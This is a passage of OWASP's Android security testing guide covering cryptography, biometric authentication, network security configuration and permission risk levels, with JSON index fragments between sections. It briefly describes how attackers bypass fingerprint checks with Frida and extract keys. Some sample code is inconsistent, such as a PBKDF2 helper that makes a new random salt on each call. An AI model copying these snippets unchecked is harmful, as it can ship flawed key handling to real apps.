The list of security providers included in Android varies between versions of Android and the OEM-specific builds. Some security provider implementations in older versions are now known to be less secure or vulnerable. Thus, Android applications should not only choose the correct algorithms and provide a good configuration, in some cases they should also pay attention to the strength of the implementations in the legacy security providers.
You can list the set of existing security providers using following code:
StringBuilder builder = new StringBuilder();\nfor (Provider provider : Security.getProviders()) {\n builder.append(\"provider: \")\n .append(provider.getName())\n .append(\" \")\n .append(provider.getVersion())\n .append(\"(\")\n .append(provider.getInfo())\n .append(\")\\n\");\n}\nString providers = builder.toString();\n//now display the string on the screen or in the logs for debugging.\n
This is the output for Android 9 (API level 28) running in an emulator with Google Play APIs:
provider: AndroidNSSP 1.0(Android Network Security Policy Provider)\nprovider: AndroidOpenSSL 1.0(Android's OpenSSL-backed security provider)\nprovider: CertPathProvider 1.0(Provider of CertPathBuilder and CertPathVerifier)\nprovider: AndroidKeyStoreBCWorkaround 1.0(Android KeyStore security provider to work around Bouncy Castle)\nprovider: BC 1.57(BouncyCastle Security Provider v1.57)\nprovider: HarmonyJSSE 1.0(Harmony JSSE Provider)\nprovider: AndroidKeyStore 1.0(Android KeyStore security provider)\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#updating-security-provider","title":"Updating security provider","text":"Keeping components up-to-date and patched is one of the core security principles. The same applies to provider
. The application should check whether the security provider in use is up-to-date and, if not, update it.
For some applications that support older versions of Android (e.g.: only used versions lower than Android 7.0 (API level 24)), bundling an up-to-date library may be the only option. Conscrypt library is a good choice in this situation to keep the cryptography consistent across the different API levels and avoid having to import Bouncy Castle which is a heavier library.
Conscrypt for Android can be imported this way:
dependencies {\n implementation 'org.conscrypt:conscrypt-android:last_version'\n}\n
Next, the provider must be registered by calling:
Security.addProvider(Conscrypt.newProvider())\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#key-generation","title":"Key Generation","text":"The Android SDK allows you to specify how a key should be generated, and under which circumstances it can be used. Android 6.0 (API level 23) introduced the KeyGenParameterSpec
class that can be used to ensure the correct key usage in the application. For example:
String keyAlias = \"MySecretKey\";\n\nKeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(keyAlias,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setRandomizedEncryptionRequired(true)\n .build();\n\nKeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES,\n \"AndroidKeyStore\");\nkeyGenerator.init(keyGenParameterSpec);\n\nSecretKey secretKey = keyGenerator.generateKey();\n
The KeyGenParameterSpec
indicates that the key can be used for encryption and decryption, but not for other purposes, such as signing or verifying. It further specifies the block mode (CBC), padding (PKCS #7), and explicitly specifies that randomized encryption is required (this is the default). Next, we enter AndroidKeyStore
as the name of the provider in the KeyGenerator.getInstance
call to ensure that the keys are stored in the Android KeyStore.
GCM is another AES block mode that provides additional security benefits over other, older modes. In addition to being cryptographically more secure, it also provides authentication. When using CBC (and other modes), authentication would need to be performed separately, using HMACs (see the \"Tampering and Reverse Engineering on Android\" chapter). Note that GCM is the only mode of AES that does not support padding.
Attempting to use the generated key in violation of the above spec would result in a security exception.
Here's an example of using that key to encrypt:
String AES_MODE = KeyProperties.KEY_ALGORITHM_AES\n + \"/\" + KeyProperties.BLOCK_MODE_CBC\n + \"/\" + KeyProperties.ENCRYPTION_PADDING_PKCS7;\nKeyStore AndroidKeyStore = AndroidKeyStore.getInstance(\"AndroidKeyStore\");\n\n// byte[] input\nKey key = AndroidKeyStore.getKey(keyAlias, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\nbyte[] encryptedBytes = cipher.doFinal(input);\nbyte[] iv = cipher.getIV();\n// save both the IV and the encryptedBytes\n
Both the IV (initialization vector) and the encrypted bytes need to be stored; otherwise decryption is not possible.
Here's how that cipher text would be decrypted. The input
is the encrypted byte array and iv
is the initialization vector from the encryption step:
// byte[] input\n// byte[] iv\nKey key = AndroidKeyStore.getKey(AES_KEY_ALIAS, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\nIvParameterSpec params = new IvParameterSpec(iv);\ncipher.init(Cipher.DECRYPT_MODE, key, params);\n\nbyte[] result = cipher.doFinal(input);\n
Since the IV is randomly generated each time, it should be saved along with the cipher text (encryptedBytes
) in order to decrypt it later.
Prior to Android 6.0 (API level 23), AES key generation was not supported. As a result, many implementations chose to use RSA and generated a public-private key pair for asymmetric encryption using KeyPairGeneratorSpec
or used SecureRandom
to generate AES keys.
Here's an example of KeyPairGenerator
and KeyPairGeneratorSpec
used to create the RSA key pair:
Date startDate = Calendar.getInstance().getTime();\nCalendar endCalendar = Calendar.getInstance();\nendCalendar.add(Calendar.YEAR, 1);\nDate endDate = endCalendar.getTime();\nKeyPairGeneratorSpec keyPairGeneratorSpec = new KeyPairGeneratorSpec.Builder(context)\n .setAlias(RSA_KEY_ALIAS)\n .setKeySize(4096)\n .setSubject(new X500Principal(\"CN=\" + RSA_KEY_ALIAS))\n .setSerialNumber(BigInteger.ONE)\n .setStartDate(startDate)\n .setEndDate(endDate)\n .build();\n\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"RSA\",\n \"AndroidKeyStore\");\nkeyPairGenerator.initialize(keyPairGeneratorSpec);\n\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\n
This sample creates the RSA key pair with a key size of 4096-bit (i.e. modulus size). Elliptic Curve (EC) keys can also be generated in a similar way. However as of Android 11 (API level 30), AndroidKeyStore does not support encryption or decryption with EC keys. They can only be used for signatures.
A symmetric encryption key can be generated from the passphrase by using the Password Based Key Derivation Function version 2 (PBKDF2). This cryptographic protocol is designed to generate cryptographic keys, which can be used for cryptographic purposes. Input parameters for the algorithm are adjusted according to the weak key generation function section. The code listing below illustrates how to generate a strong encryption key based on a password.
public static SecretKey generateStrongAESKey(char[] password, int keyLength)\n{\n    //Initialize objects and variables for later use\n    int iterationCount = 10000;\n    int saltLength = keyLength / 8;\n    SecureRandom random = new SecureRandom();\n    //Generate the salt\n    byte[] salt = new byte[saltLength];\n    random.nextBytes(salt);\n    KeySpec keySpec = new PBEKeySpec(password, salt, iterationCount, keyLength);\n    SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\");\n    byte[] keyBytes = keyFactory.generateSecret(keySpec).getEncoded();\n    return new SecretKeySpec(keyBytes, \"AES\");\n}\n
The above method requires a character array containing the password and the needed key length in bits, for instance a 128 or 256-bit AES key. We define an iteration count of 10,000 rounds which will be used by the PBKDF2 algorithm. Increasing the number of iterations significantly increases the workload for a brute-force attack on the password, however it can affect performance as more computational power is required for key derivation. We define the salt size equal to the key length divided by 8 in order to convert from bits to bytes and we use the SecureRandom
class to randomly generate a salt. The salt needs to be kept constant to ensure the same encryption key is generated time after time for the same supplied password. Note that you can store the salt privately in SharedPreferences
. It is recommended to exclude the salt from the Android backup mechanism to prevent synchronization in case of higher risk data.
Note that if you take a rooted device or a patched (e.g. repackaged) application into account as a threat to the data, it might be better to encrypt the salt with a key that is placed in the AndroidKeystore
. The Password-Based Encryption (PBE) key is generated using the recommended PBKDF2WithHmacSHA1
algorithm, until Android 8.0 (API level 26). For higher API levels, it is best to use PBKDF2withHmacSHA256
, which will end up with a longer hash value.
Note: there is a widespread false belief that the NDK should be used to hide cryptographic operations and hardcoded keys. However, using this mechanism is not effective. Attackers can still use tools to find the mechanism used and make dumps of the key in memory. Next, the control flow can be analyzed with e.g. radare2 and the keys extracted with the help of Frida or the combination of both: r2frida (see sections \"Disassembling Native Code\", \"Memory Dump\" and \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\" for more details). From Android 7.0 (API level 24) onward, it is not allowed to use private APIs, instead: public APIs need to be called, which further impacts the effectiveness of hiding it away as described in the Android Developers Blog
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#random-number-generation","title":"Random number generation","text":"Cryptography requires secure pseudo random number generation (PRNG). Standard Java classes such as java.util.Random
do not provide sufficient randomness and in fact may make it possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.
In general, SecureRandom
should be used. However, if the Android versions below Android 4.4 (API level 19) are supported, additional care needs to be taken in order to work around the bug in Android 4.1-4.3 (API level 16-18) versions that failed to properly initialize the PRNG.
Most developers should instantiate SecureRandom
via the default constructor without any arguments. Other constructors are for more advanced uses and, if used incorrectly, can lead to decreased randomness and security. The PRNG provider backing SecureRandom
uses the SHA1PRNG
from AndroidOpenSSL
(Conscrypt) provider.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
On Android, there are two mechanisms supported by the Android Runtime for local authentication: the Confirm Credential flow and the Biometric Authentication flow.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#confirm-credential-flow","title":"Confirm Credential Flow","text":"The confirm credential flow is available since Android 6.0 and is used to ensure that users do not have to enter app-specific passwords together with the lock screen protection. Instead: if a user has logged in to the device recently, then confirm-credentials can be used to unlock cryptographic materials from the AndroidKeystore
. That is, if the user unlocked the device within the set time limits (setUserAuthenticationValidityDurationSeconds
), otherwise the device needs to be unlocked again.
Note that the security of Confirm Credentials is only as strong as the protection set at the lock screen. This often means that simple predictive lock-screen patterns are used and therefore we do not recommend any apps which require L2 of security controls to use Confirm Credentials.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-authentication-flow","title":"Biometric Authentication Flow","text":"Biometric authentication is a convenient mechanism for authentication, but also introduces an additional attack surface when using it. The Android developer documentation gives an interesting overview and indicators for measuring biometric unlock security.
The Android platform offers three different classes for biometric authentication:
BiometricManager
BiometricPrompt
FingerprintManager
(deprecated in Android 9 (API level 28))The class BiometricManager
can be used to verify if biometric hardware is available on the device and if it's configured by the user. If that's the case, the class BiometricPrompt
can be used to show a system-provided biometric dialog.
The BiometricPrompt
class is a significant improvement, as it allows to have a consistent UI for biometric authentication on Android and also supports more sensors than just fingerprint.
This is different to the FingerprintManager
class which only supports fingerprint sensors and provides no UI, forcing developers to build their own fingerprint UI.
A very detailed overview and explanation of the Biometric API on Android was published on the Android Developer Blog.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager-deprecated-in-android-9-api-level-28","title":"FingerprintManager (deprecated in Android 9 (API level 28))","text":"Android 6.0 (API level 23) introduced public APIs for authenticating users via fingerprint, but is deprecated in Android 9 (API level 28). Access to the fingerprint hardware is provided through the FingerprintManager
class. An app can request fingerprint authentication by instantiating a FingerprintManager
object and calling its authenticate
method. The caller registers callback methods to handle possible outcomes of the authentication process (i.e. success, failure, or error). Note that this method doesn't constitute strong proof that fingerprint authentication has actually been performed - for example, the authentication step could be patched out by an attacker, or the \"success\" callback could be overloaded using dynamic instrumentation.
You can achieve better security by using the fingerprint API in conjunction with the Android KeyGenerator
class. With this approach, a symmetric key is stored in the Android KeyStore and unlocked with the user's fingerprint. For example, to enable user access to a remote service, an AES key is created which encrypts the authentication token. By calling setUserAuthenticationRequired(true)
when creating the key, it is ensured that the user must re-authenticate to retrieve it. The encrypted authentication token can then be saved directly on the device (e.g. via Shared Preferences). This design is a relatively safe way to ensure the user actually entered an authorized fingerprint.
An even more secure option is using asymmetric cryptography. Here, the mobile app creates an asymmetric key pair in the KeyStore and enrolls the public key on the server backend. Later transactions are then signed with the private key and verified by the server using the public key.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-library","title":"Biometric Library","text":"Android provides a library called Biometric which offers a compatibility version of the BiometricPrompt
and BiometricManager
APIs, as implemented in Android 10, with full feature support back to Android 6.0 (API 23).
You can find a reference implementation and instructions on how to show a biometric authentication dialog in the Android developer documentation.
There are two authenticate
methods available in the BiometricPrompt
class. One of them expects a CryptoObject
, which adds an additional layer of security for the biometric authentication.
The authentication flow would be as follows when using CryptoObject:
setUserAuthenticationRequired
and setInvalidatedByBiometricEnrollment
set to true. Additionally, setUserAuthenticationValidityDurationSeconds
should be set to -1.authenticate
method and the CryptoObject
.If CryptoObject
is not used as part of the authenticate method, it can be bypassed by using Frida. See the \"Dynamic Instrumentation\" section for more details.
Developers can use several validation classes offered by Android to test the implementation of biometric authentication in their app.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager","title":"FingerprintManager","text":"This section describes how to implement biometric authentication by using the FingerprintManager
class. Please keep in mind that this class is deprecated and the Biometric library should be used instead as a best practice. This section is just for reference, in case you come across such an implementation and need to analyze it.
Begin by searching for FingerprintManager.authenticate
calls. The first parameter passed to this method should be a CryptoObject
instance which is a wrapper class for crypto objects supported by FingerprintManager. Should the parameter be set to null
, this means the fingerprint authorization is purely event-bound, likely creating a security issue.
The creation of the key used to initialize the cipher wrapper can be traced back to the CryptoObject
. Verify the key was both created using the KeyGenerator
class in addition to setUserAuthenticationRequired(true)
being called during creation of the KeyGenParameterSpec
object (see code samples below).
Make sure to verify the authentication logic. For the authentication to be successful, the remote endpoint must require the client to present the secret retrieved from the KeyStore, a value derived from the secret, or a value signed with the client private key (see above).
Safely implementing fingerprint authentication requires following a few simple principles, starting by first checking if that type of authentication is even available. On the most basic front, the device must run Android 6.0 or higher (API 23+). Four other prerequisites must also be verified:
The permission must be requested in the Android Manifest:
<uses-permission\n android:name=\"android.permission.USE_FINGERPRINT\" />\n
Fingerprint hardware must be available:
FingerprintManager fingerprintManager = (FingerprintManager)\n context.getSystemService(Context.FINGERPRINT_SERVICE);\nfingerprintManager.isHardwareDetected();\n
The user must have a protected lock screen:
KeyguardManager keyguardManager = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);\nkeyguardManager.isKeyguardSecure(); //note if this is not the case: ask the user to setup a protected lock screen\n
At least one finger should be registered:
fingerprintManager.hasEnrolledFingerprints();\n
The application should have permission to ask for a user fingerprint:
context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT) == PermissionResult.PERMISSION_GRANTED;\n
If any of the above checks fail, the option for fingerprint authentication should not be offered.
It is important to remember that not every Android device offers hardware-backed key storage. The KeyInfo
class can be used to find out whether the key resides inside secure hardware such as a Trusted Execution Environment (TEE) or Secure Element (SE).
SecretKeyFactory factory = SecretKeyFactory.getInstance(getEncryptionKey().getAlgorithm(), ANDROID_KEYSTORE);\nKeyInfo secretKeyInfo = (KeyInfo) factory.getKeySpec(yourencryptionkeyhere, KeyInfo.class);\nsecretKeyInfo.isInsideSecureHardware()\n
On certain systems, it is possible to enforce the policy for biometric authentication through hardware as well. This is checked by:
keyInfo.isUserAuthenticationRequirementEnforcedBySecureHardware();\n
The following describes how to do fingerprint authentication using a symmetric key pair.
Fingerprint authentication may be implemented by creating a new AES key using the KeyGenerator
class by adding setUserAuthenticationRequired(true)
in KeyGenParameterSpec.Builder
.
generator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);\n\ngenerator.init(new KeyGenParameterSpec.Builder (KEY_ALIAS,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setUserAuthenticationRequired(true)\n .build()\n);\n\ngenerator.generateKey();\n
To perform encryption or decryption with the protected key, create a Cipher
object and initialize it with the key alias.
SecretKey keyspec = (SecretKey)keyStore.getKey(KEY_ALIAS, null);\n\nif (mode == Cipher.ENCRYPT_MODE) {\n cipher.init(mode, keyspec);\n
Keep in mind, a new key cannot be used immediately - it has to be authenticated through the FingerprintManager
first. This involves wrapping the Cipher
object into FingerprintManager.CryptoObject
which is passed to FingerprintManager.authenticate
before it will be recognized.
cryptoObject = new FingerprintManager.CryptoObject(cipher);\nfingerprintManager.authenticate(cryptoObject, new CancellationSignal(), 0, this, null);\n
The callback method onAuthenticationSucceeded(FingerprintManager.AuthenticationResult result)
is called when the authentication succeeds. The authenticated CryptoObject
can then be retrieved from the result.
public void authenticationSucceeded(FingerprintManager.AuthenticationResult result) {\n cipher = result.getCryptoObject().getCipher();\n\n //(... do something with the authenticated cipher object ...)\n}\n
The following describes how to do fingerprint authentication using an asymmetric key pair.
To implement fingerprint authentication using asymmetric cryptography, first create a signing key using the KeyPairGenerator
class, and enroll the public key with the server. You can then authenticate pieces of data by signing them on the client and verifying the signature on the server. A detailed example for authenticating to remote servers using the fingerprint API can be found in the Android Developers Blog.
A key pair is generated as follows:
KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_EC, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(MY_KEY,\n KeyProperties.PURPOSE_SIGN)\n .setDigests(KeyProperties.DIGEST_SHA256)\n .setAlgorithmParameterSpec(new ECGenParameterSpec(\"secp256r1\"))\n .setUserAuthenticationRequired(true)\n .build());\nkeyPairGenerator.generateKeyPair();\n
To use the key for signing, you need to instantiate a CryptoObject and authenticate it through FingerprintManager
.
Signature.getInstance(\"SHA256withECDSA\");\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey key = (PrivateKey) keyStore.getKey(MY_KEY, null);\nsignature.initSign(key);\nCryptoObject cryptoObject = new FingerprintManager.CryptoObject(signature);\n\nCancellationSignal cancellationSignal = new CancellationSignal();\nFingerprintManager fingerprintManager =\n context.getSystemService(FingerprintManager.class);\nfingerprintManager.authenticate(cryptoObject, cancellationSignal, 0, this, null);\n
You can now sign the contents of a byte array inputBytes
as follows.
Signature signature = cryptoObject.getSignature();\nsignature.update(inputBytes);\nbyte[] signed = signature.sign();\n
Android 7.0 (API level 24) adds the setInvalidatedByBiometricEnrollment(boolean invalidateKey)
method to KeyGenParameterSpec.Builder
. When invalidateKey
value is set to true
(the default), keys that are valid for fingerprint authentication are irreversibly invalidated when a new fingerprint is enrolled. This prevents an attacker from retrieving the key even if they are able to enroll an additional fingerprint.
Android 8.0 (API level 26) adds two additional error codes:
FINGERPRINT_ERROR_LOCKOUT_PERMANENT
: The user has tried too many times to unlock their device using the fingerprint reader.FINGERPRINT_ERROR_VENDOR
: A vendor-specific fingerprint reader error occurred. Ensure that the lock screen is set:
KeyguardManager mKeyguardManager = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);\nif (!mKeyguardManager.isKeyguardSecure()) {\n // Show a message that the user hasn't set up a lock screen.\n}\n
Create the key protected by the lock screen. In order to use this key, the user needs to have unlocked the device in the last X seconds, or the device needs to be unlocked again. Make sure that this timeout is not too long, as it becomes harder to ensure that it was the same user using the app as the user unlocking the device:
try {\n KeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\n keyStore.load(null);\n KeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\n\n // Set the alias of the entry in Android KeyStore where the key will appear\n // and the constrains (purposes) in the constructor of the Builder\n keyGenerator.init(new KeyGenParameterSpec.Builder(KEY_NAME,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setUserAuthenticationRequired(true)\n // Require that the user has unlocked in the last 30 seconds\n .setUserAuthenticationValidityDurationSeconds(30)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .build());\n keyGenerator.generateKey();\n} catch (NoSuchAlgorithmException | NoSuchProviderException\n | InvalidAlgorithmParameterException | KeyStoreException\n | CertificateException | IOException e) {\n throw new RuntimeException(\"Failed to create a symmetric key\", e);\n}\n
Set up the lock screen to confirm:
private static final int REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS = 1; //used as a number to verify whether this is where the activity results from\nIntent intent = mKeyguardManager.createConfirmDeviceCredentialIntent(null, null);\nif (intent != null) {\n startActivityForResult(intent, REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS);\n}\n
Use the key after lock screen:
@Override\nprotected void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (requestCode == REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS) {\n // Challenge completed, proceed with using cipher\n if (resultCode == RESULT_OK) {\n //use the key for the actual authentication flow\n } else {\n // The user canceled or didn\u2019t complete the lock screen\n // operation. Go to error/cancellation flow.\n }\n }\n}\n
Make sure that fingerprint authentication and/or other types of biometric authentication are exclusively based on the Android SDK and its APIs. If this is not the case, ensure that the alternative SDK has been properly vetted for any weaknesses. Make sure that the SDK is backed by the TEE/SE which unlocks a (cryptographic) secret based on the biometric authentication. This secret should not be unlocked by anything else, but a valid biometric entry. That way, it should never be the case that the fingerprint logic can be bypassed.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/","title":"Android Network Communication","text":""},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#overview","title":"Overview","text":"Almost every Android app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#android-network-security-configuration","title":"Android Network Security Configuration","text":"Starting on Android 7.0 (API level 24), Android apps can customize their network security settings using the so-called Network Security Configuration feature which offers the following key capabilities:
If an app defines a custom Network Security Configuration, you can obtain its location by searching for android:networkSecurityConfig
in the AndroidManifest.xml file.
<application android:networkSecurityConfig=\"@xml/network_security_config\"\n
In this case the file is located at @xml
(equivalent to /res/xml) and has the name \"network_security_config\" (which might vary). You should be able to find it as \"res/xml/network_security_config.xml\". If a configuration exists, the following event should be visible in the system logs:
D/NetworkSecurityConfig: Using Network Security Config from resource network_security_config\n
The Network Security Configuration is XML-based and can be used to configure app-wide and domain-specific settings:
base-config
applies to all connections that the app attempts to make.domain-config
overrides base-config
for specific domains (it can contain multiple domain
entries).For example, the following configuration uses the base-config
to prevent cleartext traffic for all domains. But it overrides that rule using a domain-config
, explicitly allowing cleartext traffic for localhost
.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <base-config cleartextTrafficPermitted=\"false\" />\n <domain-config cleartextTrafficPermitted=\"true\">\n <domain>localhost</domain>\n </domain-config>\n</network-security-config>\n
Learn more:
The default configuration for apps targeting Android 9 (API level 28) and higher is as follows:
<base-config cleartextTrafficPermitted=\"false\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 7.0 (API level 24) to Android 8.1 (API level 27) is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 6.0 (API level 23) and lower is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n</base-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#certificate-pinning","title":"Certificate Pinning","text":"The Network Security Configuration can also be used to pin declarative certificates to specific domains. This is done by providing a <pin-set>
in the Network Security Configuration, which is a set of digests (hashes) of the public key (SubjectPublicKeyInfo
) of the corresponding X.509 certificate.
When attempting to establish a connection to a remote endpoint, the system will:
If at least one of the pinned digests matches, the certificate chain will be considered valid and the connection will proceed.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n Use certificate pinning for OWASP website access including sub domains\n <domain includeSubdomains=\"true\">owasp.org</domain>\n <pin-set expiration=\"2018/8/10\">\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Intermediate CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">YLh1dUR9y6Kja30RrAn7JKnbQG/uEtLMkBgFF2Fuihg=</pin>\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Root CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">Vjs8r4z+80wjNcr1YKepWQboSIRi63WsWXhIMN+eWys=</pin>\n </pin-set>\n </domain-config>\n</network-security-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#security-provider","title":"Security Provider","text":"Android relies on a security provider to provide SSL/TLS-based connections. The problem with this kind of security provider (one example is OpenSSL), which comes with the device, is that it often has bugs and/or vulnerabilities.
To avoid known vulnerabilities, developers need to make sure that the application will install a proper security provider. Since July 11, 2016, Google has been rejecting Play Store application submissions (both new applications and updates) that use vulnerable versions of OpenSSL.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/","title":"Android Platform APIs","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#app-permissions","title":"App Permissions","text":"Android assigns a distinct system identity (Linux user ID and group ID) to every installed app. Because each Android app operates in a process sandbox, apps must explicitly request access to resources and data that are outside their sandbox. They request this access by declaring the permissions they need to use system data and features. Depending on how sensitive or critical the data or feature is, the Android system will grant the permission automatically or ask the user to approve the request.
To enhance user privacy and mitigate privacy risks, it is crucial for Android apps to minimize permission requests and only request access to sensitive information when absolutely necessary. The Android developer documentation offers valuable insights and best practices to help apps achieve the same level of functionality without requiring direct access to sensitive resources:
Android permissions can be classified into distinct categories depending on the extent of restricted data access and permitted actions that they grant to an app. This classification includes the so-called \"Protection Level\" as shown on the permissions API reference page and AndroidManifest.xml Source Definitions.
normal
. Grants apps access to isolated application-level features with minimal risk to other apps, the user, and the system. Example: android.permission.INTERNET
signature
. Granted only to apps signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_MOCK_LOCATION
systemOrSignature
. Reserved for system-embedded apps or those signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_DOWNLOAD_MANAGER
. Old synonym for signature|privileged
. Deprecated in API level 23.dangerous
. Grant additional access to restricted data or let the app perform restricted actions that more substantially affect the system and other apps.appop
. Grant access to system resources that are particularly sensitive such as displaying and drawing over other apps or accessing all storage data.normal
, signature
or dangerous
.Independently from the assigned Protection Level, it is important to consider the risk that a permission might be posing considering the additional guarded capabilities, this is especially important for preloaded apps. The following table presents a representative set of Android permissions categorized by associated risk as defined in this paper which leverages the set of (privileged) permissions and entrance points to an app to estimate its attack surface.
Risk Category Permissions Protection Level ASTRONOMICALandroid.permission.INSTALL_PACKAGES
signature CRITICAL android.permission.COPY_PROTECTED_DATA
signature android.permission.WRITE_SECURE_SETTINGS
signature android.permission.READ_FRAME_BUFFER
signature android.permission.MANAGE_CA_CERTIFICATES
signature android.permission.MANAGE_APP_OPS_MODES
signature android.permission.GRANT_RUNTIME_PERMISSIONS
signature android.permission.DUMP
signature android.permission.CAMERA
dangerous android.permission.SYSTEM_CAMERA
systemOrSignature android.permission.MANAGE_PROFILE_AND_DEVICE_OWNERS
signature android.permission.MOUNT_UNMOUNT_FILESYSTEMS
signature HIGH android.permission.INSTALL_GRANT_RUNTIME_PERMISSIONS
signature android.permission.READ_SMS
dangerous android.permission.WRITE_SMS
normal android.permission.RECEIVE_MMS
dangerous android.permission.SEND_SMS_NO_CONFIRMATION
signature android.permission.RECEIVE_SMS
dangerous android.permission.READ_LOGS
signature android.permission.READ_PRIVILEGED_PHONE_STATE
signature android.permission.LOCATION_HARDWARE
signature android.permission.ACCESS_FINE_LOCATION
dangerous android.permission.ACCESS_BACKGROUND_LOCATION
dangerous android.permission.BIND_ACCESSIBILITY_SERVICE
signature android.permission.ACCESS_WIFI_STATE
normal com.android.voicemail.permission.READ_VOICEMAIL
signature android.permission.RECORD_AUDIO
dangerous android.permission.CAPTURE_AUDIO_OUTPUT
signature android.permission.ACCESS_NOTIFICATIONS
signature android.permission.INTERACT_ACROSS_USERS_FULL
signature android.permission.BLUETOOTH_PRIVILEGED
signature android.permission.GET_PASSWORD
signature android.permission.INTERNAL_SYSTEM_WINDOW
signature MEDIUM android.permission.ACCESS_COARSE_LOCATION
dangerous android.permission.CHANGE_COMPONENT_ENABLED_STATE
signature android.permission.READ_CONTACTS
dangerous android.permission.WRITE_CONTACTS
dangerous android.permission.CONNECTIVITY_INTERNAL
signature android.permission.ACCESS_MEDIA_LOCATION
dangerous android.permission.READ_EXTERNAL_STORAGE
dangerous android.permission.WRITE_EXTERNAL_STORAGE
dangerous android.permission.SYSTEM_ALERT_WINDOW
signature android.permission.READ_CALL_LOG
dangerous android.permission.WRITE_CALL_LOG
dangerous android.permission.INTERACT_ACROSS_USERS
signature android.permission.MANAGE_USERS
signature android.permission.READ_CALENDAR
dangerous android.permission.BLUETOOTH_ADMIN
normal android.permission.BODY_SENSORS
dangerous LOW android.permission.DOWNLOAD_WITHOUT_NOTIFICATION
normal android.permission.PACKAGE_USAGE_STATS
signature android.permission.MASTER_CLEAR
signature android.permission.DELETE_PACKAGES
normal android.permission.GET_PACKAGE_SIZE
normal android.permission.BLUETOOTH
normal android.permission.DEVICE_POWER
signature NONE android.permission.ACCESS_NETWORK_STATE
normal android.permission.RECEIVE_BOOT_COMPLETED
normal android.permission.WAKE_LOCK
normal android.permission.FLASHLIGHT
normal android.permission.VIBRATE
normal android.permission.WRITE_MEDIA_STORAGE
signature android.permission.MODIFY_AUDIO_SETTINGS
normal Note that this categorization can change over time. The paper gives us an example of that:
